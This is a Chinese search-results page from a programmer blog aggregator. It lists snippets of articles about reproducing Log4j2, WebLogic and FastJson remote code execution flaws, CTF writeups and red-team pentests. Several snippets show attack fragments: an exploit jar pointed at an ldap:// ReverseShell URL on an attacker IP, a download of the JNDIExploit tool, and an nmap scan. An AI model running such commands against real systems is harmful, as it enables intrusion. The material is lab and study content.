JNDIExploit-1.2- - 程序员宅基地

外网打点，内网渗透

外网打点首先对web进行端口扫描，发现38080端口和22端口访问一下38080端口发现是一个error page 用Wappalyzer看一下是什么架构，但是好像没有检测出来【一>所有资源获取<...1、电子书籍（白帽子） ...

weblogic 各种漏洞复现

cve-2021-2109 RCE1.1 原理1.2 利用1. 先用JNDIExploit启一个监听2. 抓包 1. cve-2021-2109 RCE 需要登录控制台或者配合 CVE-2020-14882 未授权访问漏洞即可实现rce。影响版本： WebLogic 10.3.6.0.0 WebLogic ...

复现CVE-2021-44228-Apache Log4j2远程代码执行漏洞

标签： apache java 安全

使用工具JNDIExploit-1.2-SNAPSHOT.jar 前言近期Apache Log4j2被暴露了一个严重的远程代码执行安全漏洞（CVE-2021-44228），有严重的安全风险。Apache Log4j2是一款优秀的Java日志框架，被广泛地应用在中间件、...

CVE-2021-44228-Apache-Log4j-Rce漏洞反弹win&linux

标签： log4j apache linux

0x00 漏洞描述Apache Log4j 是 Apache 的一个开源项目，Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件...

FastJson远程代码执行漏洞基于JNDI反弹shell使用

标签：安全 web安全

在FastJson组件1.2.24及之前版本存在远程代码执行漏洞（CVE-2017-18349）。本文讲解的是基于JNDI的反弹shell操作。

Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）

标签： apache log4j

环境：使用Vulhub的漏洞环境工具：bp和JNDIExploit-1-1.2，需要Java环境！！

春秋云镜-Certify-Writeup

标签：安全 web安全网络安全

春秋云镜-Certify-Writeup

log4j2漏洞复现(CVE-2021-44228)

标签：安全 java 开发语言

log4j2漏洞复现(CVE-2021-44228) 漏洞简介： log4j是Apache公司的一款JAVA日志框架，基本上只要是java的框架都会用到这个log4j框架，所以上周不管是不是IT圈的都几乎被刷屏了，可见这个洞的危害之大，波及范围之广...

复现fastjson反序化漏洞(fastjson≤1.2.80)

标签：网络安全

文章利用JNDI-Injection-Exploit工具，主要讲解如何利用JNDI注入复现fastjson反序化漏洞

Log4j2 反序列化漏洞原理与复现

标签： log4j java 网络安全

Log4j2 RCE漏洞原理与复现

CVE-2021-44228-log4j2复现详细版本-简单教程。

标签： java 安全 jar

0x01-前言昨晚爆出的log4j rce 是通过lookup触发的漏洞，但jdk1.8.191以上默认不支持ldap协议，对于高版本jdk,则需要一定的依赖。不过为了给大家最简单的说明，我这里还是用jdk1.8.144的版本来运行。...

从外网 log4j2 RCE 再到内网组合拳漏洞 CVE-2021-42287、CVE-2021-42278 拿到 DC

标签：服务器 linux 运维

网络拓扑信息搜集渗透测试第一步当然是信息搜集拿到 IP192.168.81.151我们先使用nmap对他进行常规TCP端口的扫描nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,...

红队专题-漏洞挖掘代码审计-RCE-反序列化

标签： web安全安全

TransformedMap⽤于对Java标准数据结构Map做⼀个修饰，被修饰过的Map在添加新的元素时，将可以执⾏⼀个回调。super(map);

apache log4j漏洞复现

标签： apache intellij-idea java

文章目录1. Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）利用条件利用2. CVE-2019-17571利用条件利用3. apache log4j rce利用条件环境搭建利用 1. Apache Log4j Server 反序列化命令执行漏洞（CVE-...

BUUCTF-Real

标签：网络安全

BUUCTF-Real

Apache Log4j2漏洞复现

标签： log4j apache

Apache Log4j2漏洞

Apache Log4j2 RCE漏洞利用反弹shell合集

标签：安全 apache log4j log4j漏洞

Apache Log4j2 是一款开源的 Java 日志记录工具，大量的业务框架都使用了该组件。如：Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的，该功能允许...

log4j-CVE-2021-44228-vulhub复现

标签：安全

使用kali上的vulhub去打开我们输入在kali当前终端输入docker-compose up -d --build启动靶场但是启动靶场时出现了报错问题，网上搜索解决方法解决方法：给管理权限在kali终端输入：sudo docker-compose up -d 下面...

CVE-2023-21839 weblogic rce漏洞复现

标签： web安全

C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000。...

cve-2018-3191简析

标签： cve-2018-3191 weblogic 复现

如题

Weblogic Server远程代码执行漏洞（CVE-2021-2109 ）复现

标签： CVE-2021-2109 weblogic 安全

目录一.... 二.... 三....四....五....六....一....WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的...

weblogic CVE-2023-21839 复现

标签： docker 容器运维

1.使用工具JNDIExploit-1.2-SNAPSHOT.jar在kali上设置监听（JNDIExploit-1.2-SNAPSHOT.jar自己下载移动到攻击机。这里是用的docker下载的vulhub的CVE-2023-21839。这里需要go语言进行编译 go版本大于1.19。靶机和...

【Web】log4j打JNDI专题刷题记录

标签： log4j ctf web

这次换JNDIExploit来打，简单又方便啊家人们。访问/webstudy/hello-fengxuan。javac Rev.java得到Rev.class。1339端口起一个恶意ldap服务器。把恶意字节码放在1338端口。起恶意LDAPServer。监听，反弹shell。监听，...

Apache Log4j-漏洞复现（CVE-2021-44228）

标签： apache solr java

文章目录漏洞描述漏洞编号影响范围FOFA环境搭建漏洞复现漏洞复现-反弹shell参考连接摘抄漏洞描述 Apache Log4j 是 Apache 的一个开源项目，Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，...

log4j反序列化漏洞详解及利用

标签： java apache linux

Log4j漏洞详解：带你体验一把hacker之路！

Log4j远程代码执行漏洞复现尝试

标签： log4j 安全 web安全

log4j漏洞的简单复现

OpenShift Security (13) - 利用Log4j漏洞攻击容器（附视频）

标签：安全容器 log4j

利用Log4j漏洞攻击容器需要有2个条件，1）Java应用中包含受到漏洞影响的...$ curl -OL https://github.com/giterlizzi/JNDIExploit/releases/download/v1.2/JNDIExploit.zip $ unzip JNDIExploit.zip $ java -jar JND

红队内网靶场

标签：安全漏洞信息安全网络

下面几个跨域靶场会陆续加上vCenter/Kubernetes/gitlab/ADCS/exchange/等常见系统,也会陆续做安全运营相关靶场从防守方视角反推红队攻击路径逆向分析木马IoC排查终端木马编写相关报告,如果大家对靶场系列感兴趣的话...

log4j历史漏洞复现

标签： log4j 网络安全 web安全

Apache log4j是Apache的一个开源项目，Apache log4j 2是一个就Java的日志记录工具。该工具重写了 log4j框架，并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组建等，通过定义每一...

WebLogic_LDAP远程代码执行(CVE-2021-2109)

标签：安全中间件 ldap

学习了解掌握WebLogic_LDAP远程命令执行，更快的知晓中间件的漏洞利用方式及原理。

”JNDIExploit-1.2-“ 的搜索结果

外网打点，内网渗透

weblogic 各种漏洞复现

复现CVE-2021-44228-Apache Log4j2远程代码执行漏洞

CVE-2021-44228-Apache-Log4j-Rce漏洞反弹win&linux

FastJson远程代码执行漏洞基于JNDI反弹shell使用

Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）

春秋云镜-Certify-Writeup

log4j2漏洞复现(CVE-2021-44228)

复现fastjson反序化漏洞(fastjson≤1.2.80)

Log4j2 反序列化漏洞原理与复现

CVE-2021-44228-log4j2复现详细版本-简单教程。

从外网 log4j2 RCE 再到内网组合拳漏洞 CVE-2021-42287、CVE-2021-42278 拿到 DC

红队专题-漏洞挖掘代码审计-RCE-反序列化

apache log4j漏洞复现

BUUCTF-Real

Apache Log4j2漏洞复现

Apache Log4j2 RCE漏洞利用反弹shell合集

log4j-CVE-2021-44228-vulhub复现

CVE-2023-21839 weblogic rce漏洞复现

cve-2018-3191简析

Weblogic Server远程代码执行漏洞（CVE-2021-2109 ）复现

weblogic CVE-2023-21839 复现

【Web】log4j打JNDI专题刷题记录

Apache Log4j-漏洞复现（CVE-2021-44228）

log4j反序列化漏洞详解及利用

Log4j远程代码执行漏洞复现尝试

OpenShift Security (13) - 利用Log4j漏洞攻击容器（附视频）

红队内网靶场

log4j历史漏洞复现

WebLogic_LDAP远程代码执行(CVE-2021-2109)

推荐文章